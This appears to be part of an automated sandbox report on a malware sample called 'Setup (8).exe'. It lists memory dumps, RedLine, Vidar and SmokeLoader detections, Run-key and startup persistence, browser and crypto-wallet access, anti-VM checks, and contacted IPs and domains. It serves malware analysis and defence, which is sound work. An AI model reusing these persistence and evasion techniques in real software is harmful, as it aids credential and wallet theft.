memory/972-438-0x0000000004980000-0x00000000052A6000-memory.dmp
memory/5920-439-0x0000000004BD0000-0x0000000004CD6000-memory.dmp
memory/6136-447-0x0000000000000000-mapping.dmp
memory/1568-448-0x00000000054D0000-0x0000000005AE8000-memory.dmp
memory/5580-452-0x0000000000000000-mapping.dmp
memory/1424-455-0x0000000000000000-mapping.dmp
memory/5256-467-0x0000000000000000-mapping.dmp
memory/5984-468-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/5852-471-0x00000000057B0000-0x00000000057B1000-memory.dmp
memory/1512-473-0x0000000000000000-mapping.dmp
memory/6140-479-0x0000000000000000-mapping.dmp
memory/5256-489-0x0000000004B70000-0x0000000004B71000-memory.dmp
memory/5664-494-0x0000000000000000-mapping.dmp
memory/804-495-0x0000000000000000-mapping.dmp
memory/5520-498-0x0000000000000000-mapping.dmp
memory/5900-499-0x0000000000000000-mapping.dmp
memory/5424-503-0x0000000000000000-mapping.dmp
memory/1380-502-0x0000000000000000-mapping.dmp
memory/5664-504-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5520-506-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5144-513-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5420-514-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/1256-521-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5440-526-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5420-537-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5420-542-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5420-541-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/4636-533-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5900-510-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/5144-508-0x0000000000000000-mapping.dmp
memory/1380-509-0x0000000004890000-0x0000000004891000-memory.dmp
memory/1004-501-0x0000000000000000-mapping.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
299s
Max time network
1601s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3104 created 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3104 wrote to memory of 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
| PID 3104 wrote to memory of 3852 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (8).exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (8).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv O3AFFzQk7k6+SvUlMHNZuQ.0.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3852 -ip 3852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1568
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | slscr.update.microsoft.com | udp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.64.202:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.36.2:53 | slscr.update.microsoft.com | udp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 72.21.91.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | tcp |
Files
memory/3880-146-0x0000024B370A0000-0x0000024B370B0000-memory.dmp
memory/3880-147-0x0000024B37130000-0x0000024B37140000-memory.dmp
memory/3880-148-0x0000024B39720000-0x0000024B39724000-memory.dmp
memory/3880-149-0x0000024B39A10000-0x0000024B39A14000-memory.dmp
memory/3880-150-0x0000024B399D0000-0x0000024B399D1000-memory.dmp
memory/3880-151-0x0000024B39750000-0x0000024B39754000-memory.dmp
memory/3880-152-0x0000024B39740000-0x0000024B39741000-memory.dmp
memory/3880-153-0x0000024B39740000-0x0000024B39744000-memory.dmp
memory/3880-154-0x0000024B39620000-0x0000024B39621000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
190s
Max time network
1809s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\5949319.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Lyqiwyxugu.exe\"" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\13C6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4256 set thread context of 2100 | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe |
| PID 4820 set thread context of 4432 | N/A | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe | C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe |
| PID 4832 set thread context of 3084 | N/A | C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe | C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe |
| PID 4884 set thread context of 4328 | N/A | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe |
| PID 2108 set thread context of 7188 | N/A | C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe | C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-74B40.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-IT9TK.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-PSG2I.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-UK25E.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-PBP57.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Lyqiwyxugu.exe.config | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libCommon.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-4K0GO.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-TVG4R.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3PBNM.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-THQA1.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-T7V0A.tmp | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VQT1N.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-O5AR1.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-8QN73.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-HVGHE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QDDB5.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7NOFF.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CDQH4.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-64AP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-S4561.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-FIIF8.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-O05Q1.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-AUPLB.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MJCAT.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-QGQBM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Lyqiwyxugu.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-BLRRD.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-O17R6.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RHO5I.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-7LG0A.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe | C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI5262.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File created | C:\Windows\Installer\f764801.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f764801.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
